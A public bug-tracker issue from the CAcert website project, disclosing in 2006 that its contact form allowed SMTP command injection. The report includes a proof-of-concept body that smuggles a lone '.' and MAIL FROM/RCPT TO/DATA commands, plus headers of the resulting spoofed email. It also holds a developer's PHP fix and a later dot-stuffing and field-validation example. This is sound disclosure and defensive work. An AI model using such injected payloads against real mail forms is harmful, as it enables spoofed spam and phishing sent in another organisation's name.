View Issue Details

ID: 0000145
Project: Main CAcert Website
Category: logged out
View Status: public
Last Update: 2013-11-20 22:23
Reporter: bluec
Assigned To:
Priority: urgent
Severity: major
Reproducibility: always
Status: closed
Resolution: fixed
Fixed in Version: 2006
Summary: 0000145: Beware of the Evil ...
Description: It is possible to send SPAM and Phishing-E-Mails using the CAcert mailserver. These emails look exactly as if sent by CAcert or CAcert-Support.

Description
===========

The cacert sendmail() function doesn't check the variables for control commands. The SMTP protocol defines a single "." as the end of a message. If you insert a "." in your message you can start a new message afterwards.

Proof of Concept
================

Use the contact form on www.cacert.org and send the following message:

------------------8<-------------------------
test
.
MAIL FROM: XXXXX
RCPT TO: XXXXX
DATA
Subject: Owned!

Sorry ...
.
------------------8<-------------------------


And you will have the following email sent to whoever you like ...

------------------------8<---------------------------
Return-Path: <XXXXX>
Delivered-To: XXXXXXXX
Received: (qmail 16437 invoked from network); 3 Mar 2006 23:53:18 +0100
Received: from hlin.cacert.org (202.87.16.201)
  by setoy.chost.de with (DHE-RSA-AES256-SHA encrypted) SMTP; 3 Mar 2006 23:53:18 +0100
Received: from hlin.cacert.org (localhost [127.0.0.1])
    by hlin.cacert.org (Postfix) with SMTP id 07B33EA76B
    for <XXXXXXXX>; Sat, 4 Mar 2006 09:53:14 +1100 (EST)
Subject: Owned!
Message-Id: <20060303225314.07B33EA76B@hlin.cacert.org>
Date: Sat, 4 Mar 2006 09:53:14 +1100 (EST)
From: XXXXXXX
To: undisclosed-recipients:;
X-Length: 668
X-UID: 12259

Sorry ...
------------------------8<---------------------------


Solution
========

All fields written to the mailserver must be free of control commands such as "." and newlines in From: (to create other "RCPT TO:") ...


Chris
Tags: No tags attached.
Reviewed by
Test Instructions

Activities

duane

2006-03-04 10:38

developer   ~0000091

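// $message holds the mail body text.
// Split on real newlines: a single-quoted '\n' is a literal backslash-n in PHP.
$lines = explode("\n", $message);
// Rebuild the body from empty so the original lone "." lines are not kept.
$message = "";
foreach($lines as $line)
{
        $line = trim($line);
        // A lone "." would end the SMTP DATA phase; send " ." instead.
        if($line == ".")
                $message .= " .\n";
        else
                $message .= $line."\n";
}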
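
The "Solution" section of the report, sketched as an added example (not CAcert's code and not the fix in the note above): body lines are dot-stuffed as RFC 5321 section 4.5.2 specifies, rather than rewriting a lone "." to " .", and header or envelope values that contain line breaks are rejected. The function names smtp_dot_stuff and smtp_clean_field are hypothetical.

```php
<?php
// Added example, not CAcert code. Function names are hypothetical.

/**
 * Prepare a message body for the SMTP DATA phase (RFC 5321, section 4.5.2).
 */
function smtp_dot_stuff(string $body): string
{
    // Treat CRLF, bare CR and bare LF alike so no line is overlooked.
    $lines = preg_split('/\r\n|\r|\n/', rtrim($body, "\r\n"));
    $out = [];
    foreach ($lines as $line) {
        // A line beginning with "." gets one more "." in front; the
        // receiving server removes it again, so the text is unchanged.
        if ($line !== '' && $line[0] === '.') {
            $line = '.' . $line;
        }
        $out[] = $line;
    }
    return implode("\r\n", $out) . "\r\n";
}

/**
 * Validate a value destined for a header or an envelope command
 * (MAIL FROM / RCPT TO). Reject instead of repairing.
 */
function smtp_clean_field(string $value): string
{
    if (preg_match('/[\r\n\0]/', $value)) {
        throw new InvalidArgumentException('line break or NUL in mail field');
    }
    return trim($value);
}

// Constructed sample input: a form body containing a lone "." line.
$body = "test\n.\nMAIL FROM: XXXXX\n";
echo smtp_dot_stuff($body);

// Constructed sample input: a sender field carrying an embedded newline.
try {
    smtp_clean_field("someone@example.org\nRCPT TO: XXXXX");
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```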

Issue History

Date Modified | Username | Field | Change
2006-03-04 10:13 | bluec | New Issue |
2006-03-04 10:38 | duane | Status | new => closed
2006-03-04 10:38 | duane | Note Added: 0000091 |
2006-03-04 10:38 | duane | Resolution | open => fixed
2013-01-13 16:59 | Werner Dworak | Fixed in Version | => 2006
2013-11-20 22:23 | NEOatNHNG | View Status | private => public